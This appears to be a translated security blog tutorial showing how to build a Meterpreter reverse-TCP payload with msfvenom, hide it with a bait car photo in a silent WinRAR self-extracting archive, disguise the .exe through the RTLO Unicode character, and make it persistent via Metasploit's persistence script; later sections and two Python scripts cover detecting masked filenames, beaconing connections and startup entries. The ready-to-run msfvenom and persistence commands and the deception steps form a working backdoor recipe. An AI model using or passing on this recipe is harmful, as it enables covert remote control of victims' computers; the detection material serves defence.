Create a persistent backdoor by masking it with the RTLO character

Hello everybody!!

After a few weeks away (and with back and neck pain on top of that), I have taken a little time to show you a peculiar little thing that caught my attention a while ago.

You will have heard many times that it is not advisable to download, let alone run, files from unreliable or untrustworthy places (which we all do anyway, right? 😆). I used to be like that: “bah, I’m careful, I know where I’m downloading from”; “if it is a PDF or an image or something like that, nothing happens; as long as it is not an .exe or a strange format, nothing happens… right?”.

Well, things are actually a little different. This post is not really about how to build a backdoor, but about how badly one can catch us out if we do not take a minimum of care when, for example, viewing an image.

From the attacker's point of view, the steps that could be taken, as well as the tools and environments used, will be described throughout the post.

Using msfvenom, which since June 2015 has combined all the functionality of msfpayload and msfencode in a single tool of the framework, the payload can be created. The command to be used will be, for example:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.36 LPORT=4444 --platform windows --arch x86 -f exe > reverse_tcp.exe

But first, it is necessary to know what we are doing. Taking a look at the msfvenom help, you can see what each parameter that accompanies the command means.

Msfvenom help.

Therefore, our command indicates that the payload to be generated will be a meterpreter payload using a reverse TCP connection on the Windows operating system. Meterpreter payloads have the peculiarity of using in-memory DLL injection, which is why they are sometimes difficult to detect. I have chosen this payload because it is the typical one.

In addition, it indicates the local IP, that is, the IP of our machine. In this controlled environment using virtual machines, the IP of my (attacker) machine is 192.168.1.36 (you can check it with ifconfig), remembering that this IP is only reachable on internal or private networks (from the router inwards). It also indicates the port on which the TCP communication will be opened (for example, 4444).

Likewise, the platform (windows) and the x86 architecture are indicated, although these are optional parameters.

Finally, the output format, in this case an executable (exe).

All this is redirected to a specific path; you can also use -o, as the help says, to save the payload to the specified path and name.format.

I could go on explaining more about msfvenom and meterpreter (there is a lot of work and study behind them). For example, to see which payloads, encoders, architectures, platforms, etc. exist, you can use --list <type> to list all the available ones. So as not to drag this out too much, I will get to the point. Someday I will cover the topic in more detail in another post.

Finally we would have the reverse_tcp payload created.

Reverse TCP payload created.

The victim would execute this payload without knowing it, that is, we could associate it with an image (for example), so that when the image is opened the payload executes without the victim being aware.

This can be done in different ways; I will use one of the basic (and somewhat old) ways, which is “binding” the image to the payload by means of an SFX, that is, a self-extracting archive that can be generated with WinRAR. It can also be generated with other tools, for example AutoIt, although there it would not be necessary to create the payload with msfvenom: that tool can compile an au3 script directly, indicating the associated image and the payload. For convenience I will use WinRAR.

Now we just need to look for an image that is attractive to the victim. I have found one, but it could be any other.

Ford Mustang GT.

With the image chosen, it should be converted into an icon using the ICO Convert online converter. At this point we have the icon, the original image and the payload, so we can now use WinRAR to create the SFX.

Selecting the original image and the payload, we launch WinRAR to add both to the new SFX file. To do this, select Create SFX file and write a suitable name, for example FordMustang.exe (it can be changed later).

Add to SFX.

Now that we are creating an SFX, new options are enabled under the Advanced tab > SFX Options. A new window opens where we start configuring: in the Configuration tab > Run after extraction, we add the two files (image and payload) that we want to be executed after extraction.

Advanced setup tab of SFX.

We continue with the Modes tab, where we select extraction into a temporary folder and enable silent mode with “Hide everything”.

Advanced mode tab SFX.

We go to the Text and icon tab and indicate that it should load the icon created earlier.

Text and Icon tab of SFX.

Finally, in the Update tab we set Update mode to “Extract and replace files” and Overwrite mode to “Overwrite all files”.

Update tab of SFX.

Everything is ready; we click OK and the SFX is created.

Final result.

Now you will say, “but it's an exe!”. Yes, but now the RTLO (Right-To-Left Override) character comes into play. This is a Unicode character (U+202E) used to render right-to-left scripts such as Arabic and Hebrew. But in certain cases it can do a lot of damage, and this is one of them.

To type this character you can use the usual character map: in Linux, for example, “Character Map”, and in Windows likewise “Character Map”. As we are now in Windows, I show you an image.

Character map RTLO.

Since the function of the character is to render everything to its right from right to left, it has to be placed at a specific position. In our case we have FordMustang.exe and we want it to appear to end in .jpg. For that we must place the letters JPG reversed, that is, GPJ, so that when the flip happens it reads JPG, with the RTLO character placed right before the G. Look how it looks!

Effect of RTLO character

I was left like that when I discovered it 🤤. And of course you can say, OK, the exe is still visible in the name, but remember that it is not only an .exe that can execute code; you can use .bat, .cmd, .com, .lnk, .pif, .scr, .vb, .vbe, .vbs, .wsh. In addition, with a little imagination, a careful choice of words and who knows what other character in combination with RTLO, it is probably possible to change the text in such a way that this kind of masking is hard to distinguish.

Finally, and unfortunately, the payload is hidden inside an SFX and in turn masked by the RTLO character. If this reaches the victim and he executes it, he will see the photo of the Mustang GT chosen as bait, but he has already executed the payload. The result is:

Final result with RTLO

Returning to the attacker's machine: the attacker, who is waiting for the victim to “view” the Mustang GT he is going to sell him, will have Metasploit waiting for the TCP connection to be opened by the victim.

Msfconsole launched. Metasploit.

As the attacker knows the type of payload he has created, he will have configured Metasploit accordingly so that they can communicate correctly, that is, he will have selected the appropriate handler responsible for the TCP communication and the rest of the parameters with which the payload was created.

Metasploit ready and listening.

Once the victim has “viewed” the image, the attacker receives the victim's connection and the TCP session is opened.

Victim launches the malware.

Once the reverse connection is open, we can obtain system information with sysinfo.

System info of victim PC.

At this point we are going to make the backdoor persistent, since otherwise, if the victim turns off the PC, the connection is lost unless the image is “viewed” again. To avoid this, we use a Ruby script called “persistence” written by Carlos Perez. Showing the help:

Persistence help.

So, seeing this, our command will be:

 run persistence -U -i 5 -p 4444 -r 192.168.1.36

That is, every time the victim logs in, the backdoor will try to open the connection to 192.168.1.36:4444 every 5 seconds. The interval depends on what the attacker wants: for something a bit stealthier, 5 minutes may be fine; the smaller the interval, the more likely it is to be detected.

Persistence script launched.

If the machine now restarts, the attacker loses the connection, but the attacker will re-run the “exploit” command in Metasploit, which reopens the listening port, so that when the victim logs in again the connection is re-established.

Unfortunately, with all this, the attacker has managed to deceive the victim and install a backdoor that will always be active, waiting for the attacker's listener to answer in order to open the reverse connection.

COUNTERMEASURES

Seeing this and knowing how far it can go (I think it would make anyone feel a little insecure), there are some countermeasures the victim can use to detect and prevent this (at least as far as I know), that is, to know whether what he is about to view, open or execute is legitimate or not.

On the one hand, the RTLO character only works in certain circumstances: the example I have shown works in any folder (except a network folder, which gives a warning when trying to run an exe, even if we, as the victim, don't know it is one). On the other hand, if you place the file you received on the desktop, the RTLO character doesn't work. Also, if we look at the Details view, it tells us that its type is Application, and if we look at its properties it tells us that it is an .exe.
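The masking described above can also be checked without trusting what the file manager shows. The following Python script is an added example, not part of the original post: it looks for Unicode bidirectional control characters (U+202E and its relatives) in a file name, simulates how a right-to-left override would make the name appear, and compares the displayed extension with the real one. The file names in the list are constructed for the example, and the simulation of the displayed name is an approximation of how Explorer renders the override, not a rendering engine.

```python
import unicodedata
from pathlib import PureWindowsPath

# Unicode bidirectional control characters that can reorder how a name is
# displayed. U+202E is the Right-To-Left Override discussed in the post; the
# others are its siblings (embeddings, isolates, marks and their terminators).
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200e", "\u200f",                                # LRM, RLM
}

# Extensions Windows runs directly: the post's list plus .exe itself.
EXECUTABLE_EXTENSIONS = {
    ".exe", ".bat", ".cmd", ".com", ".lnk", ".pif", ".scr",
    ".vb", ".vbe", ".vbs", ".wsh",
}

# Constructed sample file names (not real files): one RTLO-masked .exe, one
# RTLO-masked .scr, one harmless image and one name with an isolate control.
CONSTRUCTED_NAMES = [
    "FordMustang\u202egpj.exe",
    "FordMustang.jpg",
    "invoice\u202efdp.scr",
    "report\u2067.txt",
]


def displayed_name(name):
    """Approximate what a file manager shows for `name` when it honours
    U+202E: everything after the first RLO is drawn right-to-left. Only the
    RLO case is simulated; the other controls are simply stripped."""
    if "\u202e" in name:
        left, _, right = name.partition("\u202e")
        name = left + right[::-1]
    return "".join(ch for ch in name if ch not in BIDI_CONTROLS)


def inspect_filename(name):
    """Describe whether `name` hides its real extension behind bidi controls."""
    controls = [
        f"U+{ord(ch):04X} ({unicodedata.name(ch)})"
        for ch in name if ch in BIDI_CONTROLS
    ]
    real_ext = PureWindowsPath(name).suffix.lower()
    shown = displayed_name(name)
    shown_ext = PureWindowsPath(shown).suffix.lower()
    return {
        "name": name,
        "bidi_controls": controls,
        "real_extension": real_ext,
        "displayed_as": shown,
        "displayed_extension": shown_ext,
        # A control character inside the name of something Windows will run
        # is the pattern from the post, whatever extension is shown.
        "masked_executable": bool(controls) and real_ext in EXECUTABLE_EXTENSIONS,
    }


def scan_names(names):
    """Inspect every name and return the results in the same order."""
    return [inspect_filename(n) for n in names]


if __name__ == "__main__":
    for result in scan_names(CONSTRUCTED_NAMES):
        flag = "MASKED EXECUTABLE" if result["masked_executable"] else "ok"
        print(f"{result['displayed_as']!r:30} real={result['real_extension']:5} "
              f"{flag}  controls={result['bidi_controls']}")
```

To check a real directory, feed `os.listdir()` of the downloads folder into `scan_names`; a hit on `masked_executable` is exactly the case where the Details view would still say Application even though the name ends in .jpg.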

Possible malware detection.

If at any time you have doubts about whether you have run something or not, you can always look at the active connections on the machine and their associated PID with netstat -o -a, and kill the process with taskkill /PID <processID> /F. You could also see processes with strange names in Task Manager. If the persistent payload has been launched but has not yet connected to the attacker, in Task Manager you can see a process with a strange name appear, launching and closing (this is due to the interval set when creating the persistence). Once the connection has been established, it remains constant.
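As an added example (not code from the original post), the script below applies the netstat check just described to a few constructed snapshots of `netstat -ano` output taken seconds apart: it parses the table into connections with their PIDs, reports outbound TCP connections to ports outside an allow-list of expected services, spots the launch-and-exit pattern (the same remote endpoint contacted by a new PID each time) that the retry interval of the persistence script produces, and prints the taskkill line for each flagged PID. The snapshots, addresses and PIDs are constructed; only 192.168.1.36:4444 is taken from the post. The port allow-list is an assumption to tune per host.

```python
from collections import defaultdict

# Constructed samples: three `netstat -ano` snapshots from the victim, a few
# seconds apart. Not real output. The backdoor retries toward the listener
# address used in the post, each time from a fresh process, until it connects.
SNAPSHOT_1 = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    192.168.1.50:49715     192.168.1.36:4444      SYN_SENT        4120
  TCP    192.168.1.50:49720     93.184.216.34:443      ESTABLISHED     2240
  UDP    0.0.0.0:5353           *:*                                    1580
"""
SNAPSHOT_2 = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    192.168.1.50:49731     192.168.1.36:4444      SYN_SENT        4388
  TCP    192.168.1.50:49720     93.184.216.34:443      ESTABLISHED     2240
"""
SNAPSHOT_3 = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.50:49740     192.168.1.36:4444      ESTABLISHED     4402
  TCP    192.168.1.50:49720     93.184.216.34:443      ESTABLISHED     2240
"""

# Remote ports an ordinary workstation is expected to talk to (assumption).
EXPECTED_REMOTE_PORTS = {53, 80, 443, 445, 3389}


def parse_netstat(text):
    """Parse the table printed by `netstat -ano` into a list of dicts.
    TCP rows have a State column, UDP rows do not."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # banner, header or blank line
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts
            state = ""
        else:
            continue  # malformed row
        # rpartition keeps IPv6 literals such as [::1]:49715 intact.
        rhost, _, rport = remote.rpartition(":")
        conns.append({
            "proto": proto, "local": local, "remote_host": rhost,
            "remote_port": int(rport) if rport.isdigit() else None,
            "state": state, "pid": int(pid),
        })
    return conns


def outbound_to_unexpected_ports(conns):
    """TCP connections leaving the host toward a port not in the allow-list,
    whether already established or still trying (SYN_SENT)."""
    return [c for c in conns
            if c["proto"] == "TCP"
            and c["state"] in ("ESTABLISHED", "SYN_SENT")
            and c["remote_port"] not in EXPECTED_REMOTE_PORTS]


def beaconing_endpoints(snapshots):
    """Across snapshots, find remote endpoints contacted by more than one
    PID: the process that appears, fails to connect and exits, over and
    over, which the post describes seeing in Task Manager."""
    pids_by_endpoint = defaultdict(set)
    for snap in snapshots:
        for c in outbound_to_unexpected_ports(parse_netstat(snap)):
            pids_by_endpoint[(c["remote_host"], c["remote_port"])].add(c["pid"])
    return {ep: sorted(pids) for ep, pids in pids_by_endpoint.items()
            if len(pids) > 1}


def kill_commands(conns):
    """The taskkill lines for every PID flagged in one snapshot."""
    pids = sorted({c["pid"] for c in outbound_to_unexpected_ports(conns)})
    return [f"taskkill /PID {pid} /F" for pid in pids]


if __name__ == "__main__":
    snaps = [SNAPSHOT_1, SNAPSHOT_2, SNAPSHOT_3]
    for ep, pids in beaconing_endpoints(snaps).items():
        print(f"repeated connection attempts to {ep[0]}:{ep[1]} from PIDs {pids}")
    for cmd in kill_commands(parse_netstat(SNAPSHOT_3)):
        print(cmd)
```

On a live machine, collect the snapshots with `netstat -ano` a few times and pass the captured text to `beaconing_endpoints`; killing the PID only ends the current attempt, so the startup entry the next paragraphs describe still has to be removed.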

Intermittent and fixed process.

To get rid of it, if we go to System Configuration (MSCONFIG), we can see that there is something strange configured to launch at system startup, and that it also has a launch path in TEMP.

Weird configuration in MSCONFIG.

If we notice this, the best thing is to delete this startup entry and then clean the TEMP folder of our machine.

As you can see, there are several ways to detect that something strange is going on. I have to say that surely not all backdoors work in the same way, but with the “guidelines” I have mentioned, some information can be extracted. As always, my recommendation is to have an antivirus, keep UAC (User Account Control) set to the maximum, keep all software updated, especially Windows, and remember that the last word is yours.

Unfortunately, most people who use a computer do not have even a medium level of knowledge that would let them avoid such a situation. Because of that, it is always good to share the knowledge one has learned and try to fight it.

Regarding the creation of the backdoor and the rest of the Allhacked posts, AT NO MOMENT, AND OF COURSE, am I responsible for any misuse, as stated in Allhacked's policies. Evil is out there, but not here; this post is focused on teaching the bad (to know how it works) and how it can be fought.

PS: Forgive so many images, but I wanted to be clear. I also remind you that Allhacked, including its posts (this one included), is also available in Spanish.

I hope I have explained myself clearly and that you liked it. See you in the next post! 😉

Happy Hacking!